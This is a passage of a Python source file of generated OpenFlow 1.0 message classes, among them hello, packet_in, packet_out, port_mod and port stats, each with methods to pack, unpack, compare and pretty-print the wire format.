        if self.miss_send_len != other.miss_send_len: return False
        return True

    def pretty_print(self, q):
        """Render as "get_config_reply { ... }" on pretty-printer q."""
        q.text("get_config_reply {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ")
                if self.xid is not None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("flags = ")
                q.text("%#x" % self.flags)
                q.text(","); q.breakable()
                q.text("miss_send_len = ")
                q.text("%#x" % self.miss_send_len)
            q.breakable()
        q.text('}')

# Register in message's dispatch table keyed on message type.
message.subtypes[8] = get_config_reply
class get_config_request(message):
    """OpenFlow 1.0 OFPT_GET_CONFIG_REQUEST (type 7); header only, no body."""
    version = 1
    type = 7

    def __init__(self, xid=None):
        # xid may be None (unassigned transaction id).
        self.xid = xid

    def pack(self):
        """Serialize to the OpenFlow 1.0 wire format and return the string."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0))  # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        length = sum(len(x) for x in packed)
        packed[2] = struct.pack("!H", length)  # backpatch the total length
        return ''.join(packed)

    @staticmethod
    def unpack(reader):
        """Parse one message from *reader*; asserts on a header mismatch."""
        obj = get_config_request()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 7)
        _length = reader.read("!H")[0]
        orig_reader = reader
        # Bound all further reads to this message's declared length.
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        return obj

    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        return True

    def pretty_print(self, q):
        """Render as "get_config_request { ... }" on pretty-printer q."""
        q.text("get_config_request {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ")
                if self.xid is not None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
            q.breakable()
        q.text('}')

# Register in message's dispatch table keyed on message type.
message.subtypes[7] = get_config_request
class hello(message):
    """OpenFlow 1.0 OFPT_HELLO (type 0); header only, no body."""
    version = 1
    type = 0

    def __init__(self, xid=None):
        # xid may be None (unassigned transaction id).
        self.xid = xid

    def pack(self):
        """Serialize to the OpenFlow 1.0 wire format and return the string."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0))  # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        length = sum(len(x) for x in packed)
        packed[2] = struct.pack("!H", length)  # backpatch the total length
        return ''.join(packed)

    @staticmethod
    def unpack(reader):
        """Parse one message from *reader*; asserts on a header mismatch."""
        obj = hello()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 0)
        _length = reader.read("!H")[0]
        orig_reader = reader
        # Bound all further reads to this message's declared length.
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        return obj

    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        return True

    def pretty_print(self, q):
        """Render as "hello { ... }" on pretty-printer q."""
        q.text("hello {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ")
                if self.xid is not None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
            q.breakable()
        q.text('}')

# Register in message's dispatch table keyed on message type.
message.subtypes[0] = hello
class hello_failed_error_msg(error_msg):
    """OpenFlow 1.0 error message with err_type OFPET_HELLO_FAILED (0)."""
    version = 1
    type = 1
    err_type = 0

    def __init__(self, xid=None, code=None, data=None):
        # Defaults applied via identity test (`is not None`) instead of the
        # original `!= None` equality test, which can invoke custom __eq__.
        self.xid = xid
        self.code = code if code is not None else 0
        self.data = data if data is not None else ''

    def pack(self):
        """Serialize to the OpenFlow 1.0 wire format and return the string."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0))  # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!H", self.err_type))
        packed.append(struct.pack("!H", self.code))
        packed.append(self.data)
        length = sum(len(x) for x in packed)
        packed[2] = struct.pack("!H", length)  # backpatch the total length
        return ''.join(packed)

    @staticmethod
    def unpack(reader):
        """Parse one message from *reader*; asserts on a header mismatch."""
        obj = hello_failed_error_msg()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 1)
        _length = reader.read("!H")[0]
        orig_reader = reader
        # Bound all further reads to this message's declared length.
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        _err_type = reader.read("!H")[0]
        assert(_err_type == 0)
        obj.code = reader.read("!H")[0]
        obj.data = str(reader.read_all())
        return obj

    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.code != other.code: return False
        if self.data != other.data: return False
        return True

    def pretty_print(self, q):
        """Render as "hello_failed_error_msg { ... }" on pretty-printer q."""
        q.text("hello_failed_error_msg {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ")
                if self.xid is not None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("code = ")
                q.text("%#x" % self.code)
                q.text(","); q.breakable()
                q.text("data = ")
                q.pp(self.data)
            q.breakable()
        q.text('}')

# Register in error_msg's dispatch table keyed on err_type.
error_msg.subtypes[0] = hello_failed_error_msg
class nicira_header(experimenter):
    """Base class for Nicira experimenter messages (experimenter id 8992).

    Concrete Nicira messages register themselves in ``subtypes`` keyed on
    the 32-bit subtype field; unpack() dispatches on it.
    """
    subtypes = {}
    version = 1
    type = 4
    experimenter = 8992

    def __init__(self, xid=None, subtype=None):
        # Defaults applied via identity test (`is not None`) instead of the
        # original `!= None` equality test, which can invoke custom __eq__.
        self.xid = xid
        self.subtype = subtype if subtype is not None else 0

    def pack(self):
        """Serialize to the OpenFlow 1.0 wire format and return the string."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0))  # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!L", self.experimenter))
        packed.append(struct.pack("!L", self.subtype))
        length = sum(len(x) for x in packed)
        packed[2] = struct.pack("!H", length)  # backpatch the total length
        return ''.join(packed)

    @staticmethod
    def unpack(reader):
        """Parse one message, dispatching to a registered subtype if any."""
        # Peek the subtype at byte offset 12 without consuming the stream.
        subtype, = reader.peek('!L', 12)
        subclass = nicira_header.subtypes.get(subtype)
        if subclass:
            return subclass.unpack(reader)
        obj = nicira_header()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 4)
        _length = reader.read("!H")[0]
        orig_reader = reader
        # Bound all further reads to this message's declared length.
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        _experimenter = reader.read("!L")[0]
        assert(_experimenter == 8992)
        obj.subtype = reader.read("!L")[0]
        return obj

    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.subtype != other.subtype: return False
        return True

    def pretty_print(self, q):
        """Render as "nicira_header { ... }" on pretty-printer q."""
        q.text("nicira_header {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ")
                if self.xid is not None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
            q.breakable()
        q.text('}')

# Register in experimenter's dispatch table keyed on experimenter id.
experimenter.subtypes[8992] = nicira_header
class nicira_controller_role_reply(nicira_header):
    """Nicira controller-role reply (experimenter 8992, subtype 11)."""
    version = 1
    type = 4
    experimenter = 8992
    subtype = 11

    def __init__(self, xid=None, role=None):
        # Defaults applied via identity test (`is not None`) instead of the
        # original `!= None` equality test, which can invoke custom __eq__.
        self.xid = xid
        self.role = role if role is not None else 0

    def pack(self):
        """Serialize to the OpenFlow 1.0 wire format and return the string."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0))  # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!L", self.experimenter))
        packed.append(struct.pack("!L", self.subtype))
        packed.append(struct.pack("!L", self.role))
        length = sum(len(x) for x in packed)
        packed[2] = struct.pack("!H", length)  # backpatch the total length
        return ''.join(packed)

    @staticmethod
    def unpack(reader):
        """Parse one message from *reader*; asserts on a header mismatch."""
        obj = nicira_controller_role_reply()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 4)
        _length = reader.read("!H")[0]
        orig_reader = reader
        # Bound all further reads to this message's declared length.
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        _experimenter = reader.read("!L")[0]
        assert(_experimenter == 8992)
        _subtype = reader.read("!L")[0]
        assert(_subtype == 11)
        obj.role = reader.read("!L")[0]
        return obj

    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.role != other.role: return False
        return True

    def pretty_print(self, q):
        """Render as "nicira_controller_role_reply { ... }" on pretty-printer q."""
        q.text("nicira_controller_role_reply {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ")
                if self.xid is not None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("role = ")
                q.text("%#x" % self.role)
            q.breakable()
        q.text('}')

# Register in nicira_header's dispatch table keyed on subtype.
nicira_header.subtypes[11] = nicira_controller_role_reply
class nicira_controller_role_request(nicira_header):
    """Nicira controller-role request (experimenter 8992, subtype 10)."""
    version = 1
    type = 4
    experimenter = 8992
    subtype = 10

    def __init__(self, xid=None, role=None):
        # Defaults applied via identity test (`is not None`) instead of the
        # original `!= None` equality test, which can invoke custom __eq__.
        self.xid = xid
        self.role = role if role is not None else 0

    def pack(self):
        """Serialize to the OpenFlow 1.0 wire format and return the string."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0))  # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!L", self.experimenter))
        packed.append(struct.pack("!L", self.subtype))
        packed.append(struct.pack("!L", self.role))
        length = sum(len(x) for x in packed)
        packed[2] = struct.pack("!H", length)  # backpatch the total length
        return ''.join(packed)

    @staticmethod
    def unpack(reader):
        """Parse one message from *reader*; asserts on a header mismatch."""
        obj = nicira_controller_role_request()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 4)
        _length = reader.read("!H")[0]
        orig_reader = reader
        # Bound all further reads to this message's declared length.
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        _experimenter = reader.read("!L")[0]
        assert(_experimenter == 8992)
        _subtype = reader.read("!L")[0]
        assert(_subtype == 10)
        obj.role = reader.read("!L")[0]
        return obj

    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.role != other.role: return False
        return True

    def pretty_print(self, q):
        """Render as "nicira_controller_role_request { ... }" on pretty-printer q."""
        q.text("nicira_controller_role_request {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ")
                if self.xid is not None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("role = ")
                q.text("%#x" % self.role)
            q.breakable()
        q.text('}')

# Register in nicira_header's dispatch table keyed on subtype.
nicira_header.subtypes[10] = nicira_controller_role_request
class packet_in(message):
    """OpenFlow 1.0 OFPT_PACKET_IN (type 10): packet received on a port.

    ``data`` holds the (possibly truncated) raw frame; ``total_len`` is the
    full frame length on the wire.
    """
    version = 1
    type = 10

    def __init__(self, xid=None, buffer_id=None, total_len=None, in_port=None, reason=None, data=None):
        # Defaults applied via identity test (`is not None`) instead of the
        # original `!= None` equality test, which can invoke custom __eq__.
        self.xid = xid
        self.buffer_id = buffer_id if buffer_id is not None else 0
        self.total_len = total_len if total_len is not None else 0
        self.in_port = in_port if in_port is not None else 0
        self.reason = reason if reason is not None else 0
        self.data = data if data is not None else ''

    def pack(self):
        """Serialize to the OpenFlow 1.0 wire format and return the string."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0))  # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!L", self.buffer_id))
        packed.append(struct.pack("!H", self.total_len))
        packed.append(util.pack_port_no(self.in_port))
        packed.append(struct.pack("!B", self.reason))
        packed.append('\x00' * 1)  # pad
        packed.append(self.data)
        length = sum(len(x) for x in packed)
        packed[2] = struct.pack("!H", length)  # backpatch the total length
        return ''.join(packed)

    @staticmethod
    def unpack(reader):
        """Parse one message from *reader*; asserts on a header mismatch."""
        obj = packet_in()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 10)
        _length = reader.read("!H")[0]
        orig_reader = reader
        # Bound all further reads to this message's declared length.
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        obj.buffer_id = reader.read("!L")[0]
        obj.total_len = reader.read("!H")[0]
        obj.in_port = util.unpack_port_no(reader)
        obj.reason = reader.read("!B")[0]
        reader.skip(1)  # pad
        obj.data = str(reader.read_all())
        return obj

    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.buffer_id != other.buffer_id: return False
        if self.total_len != other.total_len: return False
        if self.in_port != other.in_port: return False
        if self.reason != other.reason: return False
        if self.data != other.data: return False
        return True

    def pretty_print(self, q):
        """Render as "packet_in { ... }" on pretty-printer q."""
        q.text("packet_in {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ")
                if self.xid is not None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("buffer_id = ")
                q.text("%#x" % self.buffer_id)
                q.text(","); q.breakable()
                q.text("total_len = ")
                q.text("%#x" % self.total_len)
                q.text(","); q.breakable()
                q.text("in_port = ")
                q.text(util.pretty_port(self.in_port))
                q.text(","); q.breakable()
                q.text("reason = ")
                q.text("%#x" % self.reason)
                q.text(","); q.breakable()
                q.text("data = ")
                q.pp(self.data)
            q.breakable()
        q.text('}')

# Register in message's dispatch table keyed on message type.
message.subtypes[10] = packet_in
class packet_out(message):
    """OpenFlow 1.0 OFPT_PACKET_OUT (type 13): send a packet out of a port.

    Either ``buffer_id`` references a switch-buffered packet or ``data``
    carries the raw frame; ``actions`` is applied to the packet.
    """
    version = 1
    type = 13

    def __init__(self, xid=None, buffer_id=None, in_port=None, actions=None, data=None):
        # Defaults applied via identity test (`is not None`) instead of the
        # original `!= None` equality test, which can invoke custom __eq__.
        self.xid = xid
        self.buffer_id = buffer_id if buffer_id is not None else 0
        self.in_port = in_port if in_port is not None else 0
        self.actions = actions if actions is not None else []
        self.data = data if data is not None else ''

    def pack(self):
        """Serialize to the OpenFlow 1.0 wire format and return the string."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0))  # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!L", self.buffer_id))
        packed.append(util.pack_port_no(self.in_port))
        packed.append(struct.pack("!H", 0))  # placeholder for actions_len at index 6
        packed.append(loxi.generic_util.pack_list(self.actions))
        # Backpatch actions_len with the packed size of the actions blob,
        # before data is appended (packed[-1] is still the actions blob here).
        packed[6] = struct.pack("!H", len(packed[-1]))
        packed.append(self.data)
        length = sum(len(x) for x in packed)
        packed[2] = struct.pack("!H", length)  # backpatch the total length
        return ''.join(packed)

    @staticmethod
    def unpack(reader):
        """Parse one message from *reader*; asserts on a header mismatch."""
        obj = packet_out()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 13)
        _length = reader.read("!H")[0]
        orig_reader = reader
        # Bound all further reads to this message's declared length.
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        obj.buffer_id = reader.read("!L")[0]
        obj.in_port = util.unpack_port_no(reader)
        _actions_len = reader.read("!H")[0]
        # Actions occupy exactly _actions_len bytes; the remainder is data.
        obj.actions = loxi.generic_util.unpack_list(reader.slice(_actions_len), ofp.action.action.unpack)
        obj.data = str(reader.read_all())
        return obj

    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.buffer_id != other.buffer_id: return False
        if self.in_port != other.in_port: return False
        if self.actions != other.actions: return False
        if self.data != other.data: return False
        return True

    def pretty_print(self, q):
        """Render as "packet_out { ... }" on pretty-printer q."""
        q.text("packet_out {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ")
                if self.xid is not None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("buffer_id = ")
                q.text("%#x" % self.buffer_id)
                q.text(","); q.breakable()
                q.text("in_port = ")
                q.text(util.pretty_port(self.in_port))
                q.text(","); q.breakable()
                q.text("actions = ")
                q.pp(self.actions)
                q.text(","); q.breakable()
                q.text("data = ")
                q.pp(self.data)
            q.breakable()
        q.text('}')

# Register in message's dispatch table keyed on message type.
message.subtypes[13] = packet_out
class port_mod(message):
    """port_mod message (OpenFlow wire version 1, message type 15)."""
    version = 1
    type = 15

    def __init__(self, xid=None, port_no=None, hw_addr=None, config=None, mask=None, advertise=None):
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        if port_no != None:
            self.port_no = port_no
        else:
            self.port_no = 0
        if hw_addr != None:
            self.hw_addr = hw_addr
        else:
            self.hw_addr = [0,0,0,0,0,0]
        if config != None:
            self.config = config
        else:
            self.config = 0
        if mask != None:
            self.mask = mask
        else:
            self.mask = 0
        if advertise != None:
            self.advertise = advertise
        else:
            self.advertise = 0
        return

    def pack(self):
        """Serialize this message; returns the packed wire bytes."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(util.pack_port_no(self.port_no))
        packed.append(struct.pack("!6B", *self.hw_addr))
        packed.append(struct.pack("!L", self.config))
        packed.append(struct.pack("!L", self.mask))
        packed.append(struct.pack("!L", self.advertise))
        packed.append('\x00' * 4)
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)

    @staticmethod
    def unpack(reader):
        """Parse a port_mod from *reader*; returns the new object."""
        obj = port_mod()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 15)
        _length = reader.read("!H")[0]
        orig_reader = reader
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        obj.port_no = util.unpack_port_no(reader)
        obj.hw_addr = list(reader.read('!6B'))
        obj.config = reader.read("!L")[0]
        obj.mask = reader.read("!L")[0]
        obj.advertise = reader.read("!L")[0]
        reader.skip(4)
        return obj

    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.port_no != other.port_no: return False
        if self.hw_addr != other.hw_addr: return False
        if self.config != other.config: return False
        if self.mask != other.mask: return False
        if self.advertise != other.advertise: return False
        return True

    def pretty_print(self, q):
        """Dump all fields to the pretty-printer *q*."""
        q.text("port_mod {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("port_no = ");
                q.text(util.pretty_port(self.port_no))
                q.text(","); q.breakable()
                q.text("hw_addr = ");
                q.text(util.pretty_mac(self.hw_addr))
                q.text(","); q.breakable()
                q.text("config = ");
                q.text("%#x" % self.config)
                q.text(","); q.breakable()
                q.text("mask = ");
                q.text("%#x" % self.mask)
                q.text(","); q.breakable()
                q.text("advertise = ");
                q.text("%#x" % self.advertise)
            q.breakable()
        q.text('}')

# register port_mod as the handler for message type 15
message.subtypes[15] = port_mod
class port_mod_failed_error_msg(error_msg):
    """error_msg subtype for err_type 4 (port_mod failed), wire version 1."""
    version = 1
    type = 1
    err_type = 4

    def __init__(self, xid=None, code=None, data=None):
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        if code != None:
            self.code = code
        else:
            self.code = 0
        if data != None:
            self.data = data
        else:
            self.data = ''
        return

    def pack(self):
        """Serialize this message; returns the packed wire bytes."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!H", self.err_type))
        packed.append(struct.pack("!H", self.code))
        packed.append(self.data)
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)

    @staticmethod
    def unpack(reader):
        """Parse a port_mod_failed_error_msg from *reader*."""
        obj = port_mod_failed_error_msg()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 1)
        _length = reader.read("!H")[0]
        orig_reader = reader
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        _err_type = reader.read("!H")[0]
        assert(_err_type == 4)
        obj.code = reader.read("!H")[0]
        obj.data = str(reader.read_all())
        return obj

    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.code != other.code: return False
        if self.data != other.data: return False
        return True

    def pretty_print(self, q):
        """Dump all fields to the pretty-printer *q*."""
        q.text("port_mod_failed_error_msg {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("code = ");
                q.text("%#x" % self.code)
                q.text(","); q.breakable()
                q.text("data = ");
                q.pp(self.data)
            q.breakable()
        q.text('}')

# dispatch on the err_type field of error_msg
error_msg.subtypes[4] = port_mod_failed_error_msg
class port_stats_reply(stats_reply):
    """stats_reply subtype for stats_type 4 (port stats), wire version 1."""
    version = 1
    type = 17
    stats_type = 4

    def __init__(self, xid=None, flags=None, entries=None):
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        if flags != None:
            self.flags = flags
        else:
            self.flags = 0
        if entries != None:
            self.entries = entries
        else:
            self.entries = []
        return

    def pack(self):
        """Serialize this message; returns the packed wire bytes."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!H", self.stats_type))
        packed.append(struct.pack("!H", self.flags))
        packed.append(loxi.generic_util.pack_list(self.entries))
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)

    @staticmethod
    def unpack(reader):
        """Parse a port_stats_reply from *reader*."""
        obj = port_stats_reply()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 17)
        _length = reader.read("!H")[0]
        orig_reader = reader
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        _stats_type = reader.read("!H")[0]
        assert(_stats_type == 4)
        obj.flags = reader.read("!H")[0]
        obj.entries = loxi.generic_util.unpack_list(reader, ofp.common.port_stats_entry.unpack)
        return obj

    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.flags != other.flags: return False
        if self.entries != other.entries: return False
        return True

    def pretty_print(self, q):
        """Dump all fields to the pretty-printer *q*."""
        q.text("port_stats_reply {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("flags = ");
                q.text("%#x" % self.flags)
                q.text(","); q.breakable()
                q.text("entries = ");
                q.pp(self.entries)
            q.breakable()
        q.text('}')

# dispatch on the stats_type field of stats_reply
stats_reply.subtypes[4] = port_stats_reply
class port_stats_request(stats_request):
    """stats_request subtype for stats_type 4 (port stats), wire version 1."""
    version = 1
    type = 16
    stats_type = 4

    def __init__(self, xid=None, flags=None, port_no=None):
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        if flags != None:
            self.flags = flags
        else:
            self.flags = 0
        if port_no != None:
            self.port_no = port_no
        else:
            self.port_no = 0
        return

    def pack(self):
        """Serialize this message; returns the packed wire bytes."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!H", self.stats_type))
        packed.append(struct.pack("!H", self.flags))
        packed.append(util.pack_port_no(self.port_no))
        packed.append('\x00' * 6)
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)

    @staticmethod
    def unpack(reader):
        """Parse a port_stats_request from *reader*."""
        obj = port_stats_request()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 16)
        _length = reader.read("!H")[0]
        orig_reader = reader
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        _stats_type = reader.read("!H")[0]
        assert(_stats_type == 4)
        obj.flags = reader.read("!H")[0]
        obj.port_no = util.unpack_port_no(reader)
        reader.skip(6)
        return obj

    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.flags != other.flags: return False
        if self.port_no != other.port_no: return False
        return True

    def pretty_print(self, q):
        """Dump all fields to the pretty-printer *q*."""
        q.text("port_stats_request {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("flags = ");
                q.text("%#x" % self.flags)
                q.text(","); q.breakable()
                q.text("port_no = ");
                q.text(util.pretty_port(self.port_no))
            q.breakable()
        q.text('}')

# dispatch on the stats_type field of stats_request
stats_request.subtypes[4] = port_stats_request
class port_status(message):
    """port_status message (OpenFlow wire version 1, message type 12)."""
    version = 1
    type = 12

    def __init__(self, xid=None, reason=None, desc=None):
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        if reason != None:
            self.reason = reason
        else:
            self.reason = 0
        if desc != None:
            self.desc = desc
        else:
            self.desc = ofp.port_desc()
        return

    def pack(self):
        """Serialize this message; returns the packed wire bytes."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!B", self.reason))
        packed.append('\x00' * 7)
        packed.append(self.desc.pack())
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)

    @staticmethod
    def unpack(reader):
        """Parse a port_status from *reader*."""
        obj = port_status()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 12)
        _length = reader.read("!H")[0]
        orig_reader = reader
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        obj.reason = reader.read("!B")[0]
        reader.skip(7)
        obj.desc = ofp.port_desc.unpack(reader)
        return obj

    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.reason != other.reason: return False
        if self.desc != other.desc: return False
        return True

    def pretty_print(self, q):
        """Dump all fields to the pretty-printer *q*."""
        q.text("port_status {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("reason = ");
                q.text("%#x" % self.reason)
                q.text(","); q.breakable()
                q.text("desc = ");
                q.pp(self.desc)
            q.breakable()
        q.text('}')

# register port_status as the handler for message type 12
message.subtypes[12] = port_status
class queue_get_config_reply(message):
    """queue_get_config_reply message (OpenFlow wire version 1, type 21)."""
    version = 1
    type = 21

    def __init__(self, xid=None, port=None, queues=None):
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        if port != None:
            self.port = port
        else:
            self.port = 0
        if queues != None:
            self.queues = queues
        else:
            self.queues = []
        return

    def pack(self):
        """Serialize this message; returns the packed wire bytes."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(util.pack_port_no(self.port))
        packed.append('\x00' * 6)
        packed.append(loxi.generic_util.pack_list(self.queues))
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)

    @staticmethod
    def unpack(reader):
        """Parse a queue_get_config_reply from *reader*."""
        obj = queue_get_config_reply()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 21)
        _length = reader.read("!H")[0]
        orig_reader = reader
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        obj.port = util.unpack_port_no(reader)
        reader.skip(6)
        obj.queues = loxi.generic_util.unpack_list(reader, ofp.common.packet_queue.unpack)
        return obj

    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.port != other.port: return False
        if self.queues != other.queues: return False
        return True

    def pretty_print(self, q):
        """Dump all fields to the pretty-printer *q*."""
        q.text("queue_get_config_reply {")
        with q.group():
            with q.indent(2):
                q.breakable()
